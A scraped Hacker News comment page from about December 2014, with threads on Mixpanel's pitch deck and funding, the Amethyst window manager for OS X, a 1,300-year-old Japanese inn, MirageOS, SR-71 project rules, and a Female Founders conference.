Another problem with phantom feelings is that they can overlap with actual feelings. That means the brain feels itch on hand, for example, and scratching of that part triggers a relief response. This not only temporarily "fixes" the itch, but also strengthens the belief that the itch is real. After countless of these confirmations it can become near impossible to convince yourself that it is not real.

11
throw_qXH0TQ 29 minutes ago 0 replies      
Several years ago my wife and I discovered we had bed bugs. We were early twenties and had gotten married only nine months before. I started getting bitten about a month before we discovered the infestation. My wife was never bitten during the course of the infestation. We later learned that this is not uncommon with bed bugs.

Now the relation to the story about Morgellons. Bed bug bites can be extremely itchy and cause large welts on some people (not everyone as it is an allergic reaction). This was true in my case. The welts tended to be about the size of a silver dollar and last for about a week before subsiding.

We had contracted the bed bugs at a house party we had attended where I had gotten a few bites. We assumed they were mosquito bites and didn't think another thing about them. About 2 weeks after that I started getting bites while I was sleeping. Never having been exposed to bed bugs I first assumed mosquito bites or perhaps spider bites. Neither of these cases turned out to be true.

After two more weeks I began to feel very crazy for lack of a better word. The itching from the bites was driving me wild and we could not figure out what was biting me. (The infestation was never a large one, most likely it started from a single insect). I went to the student health clinic (we were graduate students at the time). They concluded bug bites but we were not sure because we could not find any bugs!

I made an appointment with a private dermatologist. Now, before I got in to see him we did more research. We did turn up bed bugs as a possibility and we looked but not thoroughly enough and found nothing. (It turns out they are very very good at hiding). The research turned up all kinds of crazy things like the Morgellons disease and various mite related infestations, such as Bird Mites. Having a bird we became alarmed at that particular possibility as bird mites are tiny and very difficult to get rid of.

The internet research made my psychological condition rapidly deteriorate. I worried constantly about the different possibilities. It affected my ability to do research. It affected my ability to properly TA. I was becoming psychotic in my search for the cause of the itching that would not cease.

Finally, I got to the private dermatologist. He suggested bed bugs and told us to search again. This time, the infestation had grown and we found them. It was such a relief to know the cause.

However, the cure is neither fast nor simple nor cheap for bed bugs. Insecticides are ineffective as they only eat mammalian blood and the most effective insecticides these days need to be ingested by the organism. The most effective thing is physical removal of the insects, their eggs, and their larva. The eggs and larva are tiny and it takes very careful searching to find and clean them all.

We spent every night for months searching with magnifying glasses and powerful flash lights while washing and drying our bedding (heat treatment (or cold) is the only sure fire solution to bed bugs). It took many months but eventually we found them all and with the help of the pest man's insecticides prevented the infestation from growing out of control. Needless to say we moved and bought a new bed when our lease was up!

Even today years later, I still fear unexplained itching. I think that for me, I could have developed a psychosis where I believe I am being bitten by invisible bugs if we had not found the infestation. It took a long time for my mental state to recover and if it had gone on for 6, 12 months of unexplained bites and itching I may have become very unstable. Itching is very difficult to deal with.

I hope that someone can help these people find an effective way for them individually to deal with the itching even if for some it is only in their minds.

12
Smaug123 1 hour ago 2 replies      
If this really is entirely psychosomatic, then sharing this article is probably one of the worse things you can do with the information.
6
The Slate Programming Language
13 points by tzar  52 minutes ago   1 comment top
1
vertex-four 4 minutes ago 0 replies      
Unfortunately, this seems to be no longer developed - last github commit is from a year ago. It might've been interesting to see another language with the image system.

I've been playing with Smalltalk recently, and it's really interesting as an environment. It has a number of RAD tools built in - the flexible Morphic GUI, the image system allowing you to store state without explicitly dealing with a database, and being able to develop from the same environment that your code runs in, allowing quick turn-around in adding and testing features - and I'm wondering why it's not used more often for line-of-business applications.

7
The pitch deck that helped us get an $865M valuation
211 points by suhail  8 hours ago   59 comments top 15
1
Xorlev 8 hours ago 4 replies      
Mixpanel helped Mixpanel get their $865M valuation. Mixpanel is solving a huge problem with a bunch of software, gobs of data, and smart people. Beyond that, they're pulling in revenue. Regardless of how good, or how brief your deck is at the end of the day your value comes down to your organization, your ability to execute, and your future revenue potential.

I'm not going to say their deck doesn't have value, but I will say it doesn't seem like it has much of one. Maybe that's the point.

2
nlh 8 hours ago 1 reply      
This is a terrific deck (and thank you guys for open sourcing it, even in redacted form - an excellent compromise that's totally fair.)

Take note of a few things:

* They don't use BS "corporate speak" -- no synergies of optimizing user solution metric analysis.

* There's no fluff. Just, none. Problem. Solution. How We're Doing. Why We're Better. What We Want To Do. The Landscape.

And it worked. This should be the baseline for every pitch deck.

3
todd3834 7 hours ago 3 replies      
The slide that helped them get an $865M valuation: https://image.slidesharecdn.com/v1-classified-141218103325-c...
4
timdorr 8 hours ago 1 reply      
Regardless of the "open source" nomenclature, this is actually pretty helpful. Not a lot of sizzle and flash in these slides, just hard numbers and facts. That can be harder for a younger company, where there is less data to pull from. But the matter-of-fact nature of the deck is key. You should have a vision, but you need to back it up with an actual execution plan and reasons for why that plan is achievable.
5
suhail 8 hours ago 2 replies      
Happy to answer questions if other founders have any on the topic of fundraising, pitch decks, etc.
6
DigitalSea 6 hours ago 0 replies      
I wish more companies released their pitch decks like this. Creating a great pitch deck is an artform in itself. Even in redacted form, I think it goes to show you don't need to use technical terms and corporate speak to raise money. Of course having a steady stream of growth also helps as well. Look at that growth graph, impressive.

Seems being concise, using facts and getting to the point quickly is the way to go. I've seen a lot of companies who go as far as creating pitch videos with fancy production, graphics, voiceovers and a soundtrack to try and use fancy visuals to get funding.

Congratulations on the recent funding round. You have a great product Mixpanel.

7
haberdasher 5 hours ago 0 replies      
Wouldn't it have been nice to hear what they actually said while they went through this deck with potential investors? Something like this would be a better share/embed IMO: http://presentio.us/view/p1tcHs
8
capkutay 7 hours ago 0 replies      
The only thing I would really read into in that pitch deck is their revenue and growth rate. VCs are not swayed by hip fonts and background colors (as much as we would all like to believe).
9
curiously 3 hours ago 0 replies      
Let's take a look at their pricing plan

https://mixpanel.com/pricing/

I wonder how much of their MRR X 12 months is multiplied by to reach $865M valuation.

    AVG MRR X 12 X ?? = $865,000,000
I can't fathom what the ?? will be, it would have to be significantly crazy. It isn't 1000.

Is it 100 ($8.6m ARR)?
Is it 50 ($17.2m ARR)?
Is it 25 ($34.4m ARR)?

What is the average valuation multiple for SaaS? Is it higher or lower than other Startup models (consumer, yearly subscription)?

If one was to replicate a similar valuation with their SaaS what would it take?

10
lukasm 8 hours ago 1 reply      
Why do you hide your growth rate when you show your graph?
11
pekk 6 hours ago 1 reply      
Let's hope it was the company which got them the valuation, because no Powerpoint presentation is worth $865M
12
colinrand 3 hours ago 0 replies      
Mixpanel getting this money at this valuation has more to do with the market conditions than anything else.
13
abannin 7 hours ago 0 replies      
Where do I submit a pull request?
14
espace 8 hours ago 5 replies      
You can't open source a pitch deck can you? Open sourcing is for source code, hence the name. This would go under a Creative Commons licence.
15
ojbyrne 8 hours ago 0 replies      
I understand that VCs value succinct, but not sure what the value of this is to anyone else. Other than to beat home the point that VCs like succinct.
8
Content, Forever
76 points by danso  5 hours ago   15 comments top 13
1
Springtime 2 hours ago 0 replies      
Why 2014 Was the Year of Sony Hacks

Something went wrong. Try another search term?

Simple and to the point, then moving onwards to the next query. This engine is next level.

2
dsugarman 4 hours ago 0 replies      
I would suggest having much more continuity in the content. I think there would be much more value in a probabilistic content retrieval mechanism that doesn't combine pieces of content but understands how interesting and relevant the content is and how long it would take to consume. It really isn't far off from what you have, just a lot more simple and would be much more pleasant to read.
3
kator 3 hours ago 0 replies      
Seems like an engine used to make a content bot site where they hang lots of ads and try to get google and others to send users there via search.
4
cbd1984 4 hours ago 0 replies      
http://i.puthtml.com/content_forever/phpQnrhxq

From Smash Mouth to cryptography and signet rings.

From what I can tell: "Fush Yu Mang" was an album, albums were once made as LPs, which were developed by Western Electric, which was an appendage of AT&T back during the Ma Bell ("We don't care. We don't have to. We're The Phone Company.") days, which had a statue called The Spirit of Communication at its 195 Broadway location, which jumps directly to AUTODIN for some reason (195 Broadway was owned by Western Union... ?), which leads to leased lines, which leads to OSI, PKI, csexps, digital signatures, and signet rings.

The End.

It's like when I take too much caffeine.

5
hotgoldminer 53 minutes ago 0 replies      
Does it have a character limit from whatever text source and then search the last phrase in the source text and repeat ad infinitum?
6
geekam 4 hours ago 0 replies      
>> What Can We Learn From windows?

>>> After a lengthy development process, Windows Vista was released on November 30, 2006 for volume licensing and January 30, 2007 for consumers.

...

>>> Many types of aquatic animals commonly referred to as "fish" are not fish in the sense given above; examples include shellfish, cuttlefish, starfish, crayfish and jellyfish.

>> The End

7
maxerickson 4 hours ago 0 replies      
What Can We Learn From butter?

It generally has a pale yellow color, but varies from deep yellow to nearly white.

...

In telecommunication and radio communication, spread-spectrum techniques are methods by which a signal (e.g.

9
shkkmo 4 hours ago 1 reply      
Many of the steps seem reasonable, but I couldn't follow some of the associations:

E.G.

"The first large proton synchrotron was the Cosmotron at Brookhaven National Laboratory, which accelerated protons to about 3 GeV (1953-1968)."

directly to:

"The stated purpose of the one-party state was to ensure that capitalist exploitation would not return to the Soviet Union and that the principles of Democratic Centralism would be most effective in representing the people's will in a practical manner."

Very entertaining.

10
netex 3 hours ago 1 reply      
I thought I would learn something but I didn't take the full 1 minute to read the results on "beer".
11
UhUhUhUh 2 hours ago 0 replies      
Some cadavre exquis?
12
rsync 5 hours ago 0 replies      
Try this. The results are laugh out loud funny. In a good way.
13
curiously 3 hours ago 0 replies      
w.o.w.

Absolutely amazing and chilling at the same time. I typed in "sex" and had 1 minute of free time. It seemed coherent but the subject matter seemed to drift far away. Some tweaking and it would be very convincing.

9
Misfortune Cookie
9 points by sinak  51 minutes ago   2 comments top 2
1
jlebar 1 minute ago 0 replies      
I for one welcome our new convention of giving security vulnerabilities cute logos and names. It elevates their importance in the public eye, which -- I hope -- will elevate the importance of finding, fixing, and avoiding security vulnerabilities among the technoscenti.

I'll go out on a limb and say that if this pattern continues, it may be the most significant legacy of heartbleed.

2
Splendor 3 minutes ago 0 replies      
Scrolling on that site is very frustrating.
10
Amethyst - A tiling window manager for OS X
172 points by xj9  9 hours ago   88 comments top 20
1
bombtrack 8 hours ago 9 replies      
I posted this yesterday in the thread about the Rust-written window manager, but it's relevant here as well.

There are plenty of apps that provide varying levels of window-manager functionality to OS X. I would try a couple out and see which feels right to you. I have tried most of them, and personally prefer Moom.

http://manytricks.com/moom/
http://mizage.com/divvy/
http://ianyh.com/amethyst/
http://spectacleapp.com/
https://github.com/fjolnir/xnomad
https://itunes.apple.com/us/app/bettersnaptool/id417375580?m....
https://github.com/sdegutis/mjolnir

2
shawn-furyan 8 hours ago 2 replies      
I've been using Amethyst as my WM for a couple months now, and have used XMonad for significant stretches in the past.

Amethyst tries to bring the XMonad experience to OSX. I think it does an admirable job, but there are some distinctions. Amethyst is simpler to set up, and is more forgiving to newcomers. It has a GUI for configuration, and an easily accessible list of commands. It also works on top of OSX's WM, so it's not so enormous a departure, especially compared to XMonad's fairly extreme dismissal of the mouse.

On the down side, XMonad really outshines Amethyst when it comes to performance. Amethyst is downright sluggish, where I've always found XMonad to be very responsive. Still, it's overall a true enough translation, and the sluggishness rarely actually hinders productivity. Overall, I think Amethyst is a capable daily driver, and a great intro to tiled window managers.

3
ianyh 7 hours ago 3 replies      
I'm the Amethyst developer. I'm happy to answer any questions people have. I'm hopping on a cross-country plane flight in about an hour, but I have a layover. I'll try to get back to people as soon as I can.
4
platz 8 hours ago 1 reply      
I like tiling managers, but dislike having predefined layouts. Being able to split any tile horizontally or vertically arbitrarily many times is the way to go (i.e. i3-style). Would like to see tiling wm authors to consider this option when starting new projects.
5
DevMonkey 6 hours ago 1 reply      
For Windows I just stumbled across MaxTo (http://maxto.net/) I've been using it for a couple of days and I'm really impressed.
6
pmoriarty 8 hours ago 2 replies      
Wow. This has focus follows mouse! (though they call it "mouse-follows-focus", for some reason)

I've been told focus follows mouse was impossible on OS X.

7
dylanz 7 hours ago 1 reply      
First off, thank you ianyh!! Tiling window managers are a huge productivity tool, and when I see people manually resizing windows, it's painful to watch. I'm on OSX now, but used XMonad extensively when I was on a *n?x distro.

At the moment, I'm using Spectacle for OSX. http://spectacleapp.com/. Are there reasons I should use Amethyst instead? I'd love to see a feature matrix or something in your FAQ about the other options, and what Amethyst brings to the table.

8
nchuhoai 6 hours ago 0 replies      
I've used BetterTouchTool's tiling functionality for the most part, but I just got a 4K monitor and most granular most tiling managers can do is quarters. I wish there was an out-of-the-box solution that allows me to just tile my space more granularly
9
0942v8653 7 hours ago 0 replies      
I use a window manager, but really only to have a hotkey that fullscreens a window (three, actually: one for current, one for left and one for right display). With 2 displays, I find that I have all I need with just an editor window and a documentation browser window. I guess I have smaller displays than most people because if I resize a window (browser windows mostly) beyond about 2/3 its layout gets messed up or a horizontal scrollbar appears.
10
RussianCow 8 hours ago 6 replies      
I really just want a window manager that allows windows to snap to each other and the edges of the screen when resizing or moving them. Does something like that exist? I don't care for the pre-defined layouts or hotkeys, I just want to be able to visually drag/resize my windows and have them take up the most optimal amount of space.
11
oDot 4 hours ago 1 reply      
Seeing this (and others like it), what's the benefit of having a tiling-only WM over a floating WM with tiling capabilities?
12
rcknight 9 hours ago 0 replies      
Weird, I was literally just googling for this and found Amethyst. Seems nice.

I've noticed it gets a little slow to rearrange things sometimes with lots of windows but the functionality I need is all there.

Works great with my three screen setup too, which many tools like this don't.

13
axotty 8 hours ago 3 replies      
Am I the only weirdo who just uses multiple workspaces with ctrl-arrow and cmd-tab like a mad man? I genuinely enjoy it, especially with a second monitor.

I, maybe, have one or two apps sharing a single workspace. Most apps are in full screen.

14
Vecrios 9 hours ago 1 reply      
What's the benefit of using this vs. WMs like SizeUp?

I'm asking this question because I'm quite comfortable with SizeUp and don't understand if learning how to use a WM is worth it.

15
pmoriarty 8 hours ago 1 reply      
Does anyone know whether there's any chance i3 could be ported to OS X's native windowing system (whatever it's called) ?
16
hugg 6 hours ago 2 replies      
Looks really weird with the window shadows though.
17
gngrwzrd 5 hours ago 0 replies      
it's ok, I prefer to be able to set windows where I want them and assign keyboard shortcuts. I was the original author of Breeze, now autumn apps has it available - http://autumnapps.com/breeze/index.html
18
anoxic 9 hours ago 0 replies      
Use this every day. Works great.
19
cheshire137 3 hours ago 0 replies      
Divvy is sufficient for me.
20
salas106 8 hours ago 0 replies      
Use it also. Cool tiling manager.
11
A Japanese inn owned by the same family for 1,300 years [video]
137 points by Thevet  7 hours ago   34 comments top 9
1
datamatt 6 hours ago 3 replies      
Not actually the same family, typically the new owners will "adopt" a son, who is just the highest ranking manager: http://en.wikipedia.org/wiki/Japanese_adult_adoption
2
fotografritz 2 hours ago 1 reply      
I'm the guy who made this video, so I want to address some questions from this thread. Really interesting discussion by the way, I'm happy so many people take an interest in this film!

Not really family/adoption:

To be honest, the whole history of the Houshi family is kind of a mystery. There was no real documentation in paper back then. No photos, and paintings or such were only for rich people. Yet, the whole town kinda grew around the hot springs and this one hotel in particular. So the history of the hotel and the family is very much connected with the history of the town. That's also where the proof for the Guinness Bureau came from. They wouldn't just accept them saying "yea, we old."

What changed in 2011:

An even older hotel submitted their application.

Also: as far as I found out, that older hotel is not a straight "same-family" business, or at least not anymore. I'm a bit sceptical of that posted source below. There's an association for family businesses older than 200 years AND still running, and that hotel is not part of that, Houshi is.

The daughter's motivation:

I shot this film over the course of six days, in April and in June. When I was doing the interviews in April, the daughter didn't actually know that her father decided that she should take over. I was the one who told her during the interview (assuming then she was aware of it of course). She officially started in May, and when I came back in June, she was much more adjusted. She's actually doing pretty well. There's also a second son, even working in the hotel, longer than the daughter, but according to the father, he's not smart enough to manage the inn. The daughter is actually much stronger and smarter than she thinks she is. That's why the father chose her. In 1,300 years, no woman was the official owner of the inn. However, they were allowed to be "temporary owners" until the son came of age or someone was adopted. Yet, the father considers giving the daughter now the title of Zengoro. She would be the first woman in 1,300 years to wear that title. But it's not final yet. I consider going back there in a couple of years to see what's changed.

The first born son gets trained from day one to become the owner. The daughter wasn't properly prepared. Yet, she loves her family dearly and is caught between her love, obligation and duty. For someone carrying the weight of 1,300 years and 46 generations, she is doing remarkably well.

3
jpatokal 1 hour ago 1 reply      
The inn's English homepage: http://www.ho-shi.co.jp/jiten/Houshi_E/home.htm

Rates start from Y9900/person (~US$83) for a midweek stay with two meals, although better rooms and meals can cost considerably more.

Reviews seem a bit mediocre though: this is a large ryokan geared for large groups, and not particularly luxurious as far as these things go.

4
Ronsenshi 6 hours ago 1 reply      
Very interesting.

I always wondered what would be morally just position on such long standing establishments when it comes to inheritance of responsibility.

On the one hand kids of such family shouldn't be tied to the family business if they don't find it fulfilling. On the other hand if they won't continue the line traditions might die and with them such old and interesting places as this one or any other.

But as datamatt writes, I guess adult adoption does help with that. If kids in such family feel that they are not up to the task, their parents can adopt a person (a man in this case) who will continue with this tradition.

5
alexyes 5 hours ago 1 reply      
"Until 2011, it held the record for being the oldest hotel in the world."

I wondered what happened in 2011

6
cookrn 6 hours ago 0 replies      
One of the "world's oldest continuously ongoing independent company" [0] also hails from Japan, although it became a subsidiary of another company awhile back

[0] https://en.wikipedia.org/wiki/Kong%C5%8D_Gumi

7
cLeEOGPw 5 hours ago 3 replies      
The daughter seems to be very depressed and clearly isn't intending on continuing this tradition.
8
suyash 3 hours ago 1 reply      
Anyone having good luck watching the video? I have tried all 3 major browsers and none are buffering and playing the media seamlessly. Maybe it's Vimeo's player that is bad.
9
icosahedron 5 hours ago 0 replies      
I hope they find someone to adopt or marry who will care for this hotel.

As someone else pointed out, the daughter seems to be sad. I hope she is able to find someone to make her happy and is able to let her do what makes her happy.

12
Amazon Unveils One-Hour Delivery Service
219 points by spew  11 hours ago   112 comments top 19
1
morgante 7 hours ago 3 replies      
I just placed an order with this new service (some HDMI cables for our office).

The selection is pretty decent, definitely comparable to Google Shopping Express.

One very odd note though: they ask for a variable tip to the delivery courier (something Google doesn't do). So even for "free" 2 hour delivery, you're paying for delivery. While I see how this is better for the courier, I think it's a big mistake: people hate navigating the social dilemma of how to tip properly, and solving social dilemmas is a key advantage of digital services.

2
jcr 10 hours ago 1 reply      
Just as Amazon is trying to use 1 hour delivery to compete better against brick-and-mortar companies, Google is trying to help the brick-and-mortar companies compete with Amazon by providing a competing delivery service called "Google Express" (previously called "Google Shopping Express") [1]. It's been mentioned a few times on hn [2,3].

[1] https://www.google.com/shopping/express/

[2] https://news.ycombinator.com/item?id=8037108

[3] https://news.ycombinator.com/item?id=8452337

3
mooreds 8 hours ago 10 replies      
It's hard for me to see how this doesn't hurt local vendors badly. Of course, it depends on what the 25,000 items are, but that was one of the key differentiators between Amazon and local stores--if you needed something and you needed it now, the local store was the only option (things like cabling for a new TV, gifts for a party that night, etc).

Now, for prime members in NYC at least, Amazon is a viable option.

What other moats do local stores have? Amazon wins on:

   * selection
   * cost
   * convenience
   * reputation
   * knowledge (this depends on the local store)

What does the local store win on?

   * feel good factor (supporting local business and employment)
   * hold the item in your hand (not sure there is one word for it in English, but the Germans probably have one)

It's a draw on

   * I need it now

Interesting times, indeed.

4
guelo 3 hours ago 1 reply      
What I don't understand about the big retailers is why they haven't been doing something similar all along to compete with Amazon.

Amazon has been building warehouses all across the country near cities to reduce shipping times. But the retailers already have what amounts to hundreds of warehouses at every population center, plus the inventory management systems. Why haven't they put their inventories online and offered same day delivery to neutralize Amazon?

5
BrandonY 6 hours ago 0 replies      
Somewhere, Kozmo.com CEO Joseph Park is reminding someone that this is Jeff Bezos's second attempt at one hour delivery, and that he was already doing this for Bezos back in the 20th century.
6
comrade1 4 hours ago 0 replies      
Time to order KY lubricant and the Sports Illustrated swimsuit edition delivered to a bathroom stall at SFO...

(if you don't remember Kozmo, this was done by a reporter during the last dotcom boom/bust as a joke)

7
jtchang 10 hours ago 2 replies      
I'm pretty sure the logistics of 1 hour delivery can get pretty insane. However what I am really looking forward to is real time delivery anywhere.

And how about returns? Can I return stuff in one hour too?

8
smackfu 9 hours ago 2 replies      
I'm more impressed that the two-hour delivery is free.
9
Instacartlove 7 hours ago 0 replies      
Having the ability to pickup and deliver from multiple locations throughout a city like Postmates or Instacart does is a huge advantage. At least for a one hour delivery. Density of drivers in a city is an important factor as well. If you can route a driver to a location nearby instead of a single warehouse you can be more efficient. Instacart and Postmates also both have high frequency categories that they can use to leverage less frequent items, e.g essentials over time and potentially at lower costs.
10
nateberkopec 8 hours ago 1 reply      
This headline could've read: "Amazon relaunches Webvan".

Very interesting how ideas from the first bubble re: brick-and-mortar are coming back.

11
Rygu 7 hours ago 0 replies      
Just heard about Shyp yesterday. Seems like it's the same idea but selling the concept of regular people helping each other for a more personal service (like Uber, Lyft). I kind of like that approach. http://www.shyp.com/heroes
12
free2rhyme214 8 hours ago 0 replies      
What most don't realize is that Amazon is taking on Fedex, UPS, and the USPS by doing it themselves for profit. This is actually very smart if you can solve the logistics problem long term because this model can be leveraged in many other cities.
13
shalbert 9 hours ago 2 replies      
How can they get to places within an hour and make a worthwhile margin of profit?
14
marban 9 hours ago 0 replies      
Are they outsourcing the couriers in this case? The promo video looks like as if these guys are sourced straight from a Chrome Industries / Rapha commercial.
15
quackware 9 hours ago 2 replies      
Unfortunately only in the 10001 zip code.
16
Dirlewanger 9 hours ago 4 replies      
Can't wait to see how awesome the work environment will be for these couriers! Probably much like Uber's drivers: under constant pressure to meet a quota (in this case, probably minimizing the number of missed 1 hour marks), and if you're injured/hit/cause an accident, it's on you and the employer will be nowhere to be found.
17
mrfusion 9 hours ago 2 replies      
Wouldn't four hours or anything same day be just as good? Why not save some costs there?
18
redgrange 10 hours ago 0 replies      
19
curiously 2 hours ago 0 replies      
Meanwhile in Canada...
13
State of the MirageOS: an OCaml unikernel [video]
25 points by zellyn  4 hours ago   3 comments top
1
zellyn 4 hours ago 1 reply      
via https://lobste.rs/s/hgknhb/state_of_the_mirage_an_ocaml_unik...

Submitted here, to get a wider audience, and ask: does anything in Rust preclude this from being done in Rust rather than OCaml? Sounds like a nice idea...

14
A Complete List of .Gov Domains
42 points by konklone  4 hours ago   6 comments top 3
1
konklone 3 hours ago 2 replies      
For some extra clarification: this is the official list, as released by the General Services Administration, the part of the government that runs the registry.

Some of these -- the domains for the federal government's executive branch -- were already public. This includes the rest of the federal government (e.g. Congress, the courts), as well as all the .gov's in states, territories, counties, cities, and native tribes.

There's about 5,300 of them.

2
dsl 41 minutes ago 0 replies      
I believe this document is the first public acknowledgement on the government side of the relationship that the Laboratory for Physical Sciences at the University of Maryland is an NSA facility. Even the agency's own NSA.gov domain is listed as controlled by the "Department of Defense."
3
codyb 2 hours ago 0 replies      
I'm actually surprised at this action with the recent rash of actions by cracker collectives like Anonymous aimed at local and national governments.

However, I do appreciate the transparency.

I guess some of the interesting things you might be able to do include analyzations like

1) What states counties have more .gov websites for their municipal functions

2) What states counties have the most disparity in municipal function websites

There's probably some interesting things you could ascertain from this data set given a weekend and some drive.

15
Memo: Open-source note-taking software with hack value
18 points by unixguy  3 hours ago   discuss
16
The inventor of the SR-71's rules for project management
83 points by valarauca1  7 hours ago   26 comments top 5
1
fsloth 6 hours ago 4 replies      
I resent calling Kelly Johnson merely the inventor of SR-71. He was the father, the project manager and the organizational hustler who founded Skunk Works and defined its working culture. He was a legendary aviation engineer but also really understood how to get a team of experts to produce results and to co-operate with the manufacturing and operations to create feats of engineering.

He founded and ran a lean organization on grit and thriftiness when Toyota production system was taking its baby steps in Japan.

I heartily suggest Ben Rich's 'Skunk works' to anyone who gets a kick out of a true story what it actually means in terms of output when an innovative engineering team actually works lean... in hardware.

2
ixtli 2 hours ago 2 replies      
"Because only a few people will be used in engineering and most other areas, ways must be provided to reward good performance by pay not based on the number of personnel supervised."

The lack of this is the #1 problem with professional software engineering.

3
guiomie 5 hours ago 4 replies      
From the link: According to the book "Skunk Works" the 15th rule is: "Starve before doing business with the damned Navy. They don't know what the hell they want and will drive you up a wall before they break either your heart or a more exposed part of your anatomy."

any examples out there?

4
dang 6 hours ago 0 replies      
We changed the url from http://valarauca1.blogspot.com/2014/12/kellys-14-rules-of-pr... to the Wikipedia article it points to, which appears to contain the originals.
5
tdicola 5 hours ago 3 replies      
I find HN's infatuation with SR-71 kind of amusing. I think the site should have a logo that's the SR-71 flying over a globe or something similar. If you think about it the Y logo kind of looks like an SR-71... :)
17
Mixpanel (YC S09) Raises $65M to Build Predictive Data Tech
120 points by lightcatcher  8 hours ago   18 comments top 6
1
sqs 4 hours ago 1 reply      
Congrats to Mixpanel on the raise. I have heard many great things from them and used them at a previous company. They've done a great job of making it a no-brainer for startups to start using more advanced analytics tools (not just Google Analytics) from day 1. I think we're all better off for the ability it gives product developers to improve their product based on actual usage--since it means the overall quality of products is far better than if vanity metrics drove all product decisions.

I noticed they mentioned Heap Analytics (https://heapanalytics.com/) as one of their competitors. We've been using Heap for over a year and it seems like the logical and magical next step in analytics. Mixpanel gave you smarter analytics on things you had the foresight to track, but Heap automatically tracks everything from the day you integrate it. That means you can get smart analytics even on things you didn't have the clairvoyance to start tracking 6 months ago, or didn't have the resources to insert tracking code in.

For startups, Heap's automatic and retroactive tracking is huge. It means we can iterate on product features and marketing/outreach schemes way more quickly while still getting insight into what's successful and what's not. It's not perfect--a couple times we've added special class names to our HTML elements so Heap can distinguish them, but that's still easier than adding manual tracking code--but it's a huge improvement over the old way.

I noticed Heap has a page comparing themselves with Mixpanel (https://heapanalytics.com/compare/heap-vs-mixpanel) but I don't see anything similar from Mixpanel's POV. I'd be curious to hear what Mixpanel's plans are in this area (automatic/retroactive tracking).

2
nathas 8 hours ago 8 replies      
I really wish they would invest in helping their users answer the "Why" question more. Why did users click that link 5000 times? Why is this funnel dropping off? Why did the time-to-first-interaction increase?

These are questions for the business, but I feel like Mixpanel could add so much more context. "We noticed that 'time to first interaction' has gone down with 'watched home page video'." That would at least be a clue.

MP has the data, but all of that analysis is manual (or was, last time I used it).

3
rubyrescue 8 hours ago 0 replies      
Congrats to the Mixpanel team. They have always been very supportive when we've had questions. When we had a problem with a particular statistic a few months back, they actually came on-site to diagnose.
4
Yadi 8 hours ago 0 replies      
Kudos to the hardworking team. I've always thought that Google would acquire them, but their commitment and goal driven startup means a lot to their clients at this point, which is awesome.
5
snowmaker 8 hours ago 0 replies      
Congrats to Suhail and team. They have done absolutely incredible work with Mixpanel, building the world's best analytics solution, starting from a tiny team and against stiff competition.
6
thorpus 8 hours ago 0 replies      
2015 is so going to be the year of personalization and actionable analytics. Seeing this stuff everywhere.
18
Barcode-in-barcode attacks [pdf]
34 points by sp332  6 hours ago   2 comments top
1
jszymborski 57 minutes ago 1 reply      
It's interesting, but is it much of an attack? Ok, so you can determine what OS your phone is running, but you can do that by coding a QR code that brings them to a webpage that registers it with javascript; you need to direct them to a site regardless to collect your findings from this attack.
20
Female Founders Conference 2015 applications are open
82 points by katm  7 hours ago   51 comments top 6
1
d0m 39 minutes ago 0 replies      
I understand where a lot of people commenting here come from, but I think Female only tech events are actually amazing.

I believe the main reason why there's less women in tech is because there's less women in tech(!) It's really hard to jump in a new field where you're the extreme minority. Just as a crude example, imagine getting into nursing school as a guy. That would take a lot of guts. I know because I have a friend who did it and you can easily imagine the kind of comments he's getting all the time from families, strangers, administrators, etc. However, if there were more guys in nursing, it wouldn't be as hard.

You can also think about being gay in San-Francisco right now vs 50 years ago. Yes, a lot of things changed, but part of the reason why it's getting much better is because there simply are more gays, you know you're not alone.

I'm not sure if this was a good example. But women in tech are a bit similar. It's hard to jump in when you're the minority. It's much easier to take the easy route and get a profession where there's already a good ratio of men/women.

Why am I saying all this? Because I think women-only events help girls looking to move into tech understand that there actually are women in tech. If we'd only have mixed-in events, the few women in the crowd would easily be missed by the overwhelming majority of guys.

Someone also posted something about Black, Latino/Hispanic Founders. That's extremely related. A black friend of mine told me that one of the hardest things about being black in the tech community is that he's almost always the only one. It takes a lot of guts to be the only different one in the room. Some people like that, but for lots of people it's hard. Personally, as an introvert, I'd hate to have everyone in the room looking at me the second I enter the room, all the time.

2
viiralvx 3 hours ago 0 replies      
When are we going to have the Black or Latino/Hispanic Founders Conference, YC?
3
sremani 3 hours ago 1 reply      
I am not against conferences like these - women to women connection is different from women to mixed crowd. Actually, I would not mind men only conferences either if they improve the social environment for all the attendees.
4
jcr 5 minutes ago 0 replies      
Anyone can apply to attend the Female Founders Conference so it's not "female only" as some have mistakenly claimed. If you are notable in the given specialization and you want to speak at the conference, I'm sure you could contact them and ask if they need more speakers. Like most YC-related events and functions (e.g. funding batches, startup school, hack weekend, etc.), the main problem they face is most likely limited space/resources. If you know anything about YC, then you know they will optimize for quality and growth/scale. If you're unable to attend, YC does provide videos of the talks [1] so you can still learn from them.

Though I'd definitely learn a lot at this conference, I'm not going to apply for an invitation because I'd rather see the limited invitations go to people who can make the most of them. I'm not founder material, so I should wait until the videos get released. If I was mistakenly given an invitation, I'd politely and humorously report it as a bug in their optimization algorithms. ;-)

HN users tptacek and cpercival are known representatives of a specific minority in tech, namely, people with a reasonable grasp of crypto. If there was a specialized conference of this crypto-cogent minority, the people who would gain the most from the conference are either already crypto-cogent, or are considering becoming crypto-cogent. The rest of us crypto-ignorant people (myself included as an admitted crypto-failure) are much better off always trying to learn from the experiences they generously share. If the title of this story was, "Crypto Conference 2015 Applications Are Open," I'd like to believe people on HN would not be arguing whether specialized cryptography conferences should exist.

All conferences are specialized in some sense. Learning from the unique perspectives and experiences of said specialization is one of the main reasons for going to any conference. The other reason is networking with your peers. The specialization can be a field, topic, group, or some other commonality. In this case, the specialization is Female Founders and the chance to learn from them is a fantastic but rare opportunity. The same is true for any specialized group of notable people speaking on topics where they have the benefit of experience and perspective.

My challenge to you, the regular HN user, is can you tell me something interesting about the accomplishments of any of the speakers?

I'll start. Jessica Livingston wrote a book called "Founders At Work" and it's one of my absolute favorites. I've nearly broken the binding on my copy with all the sticky-note page markers. Though my server will probably melt from the load, proof of my assertion is available [2].

[1] https://www.youtube.com/playlist?list=PLQ-uHSnFig5PSIanlQ_x6...

[2] http://designtools.org/pix/DSCN0022.JPG

5
taprun 6 hours ago 8 replies      
I always wonder if these "female only" conferences, awards and events are beneficial for women.

Many folks might (mistakenly) see them as an admission that women can't hack it on a level playing field. Such thoughts would only serve to harden their chauvinistic mental models and cause gender discrimination to be more (rather than less) likely in the future.

6
ps4fanboy 3 hours ago 1 reply      
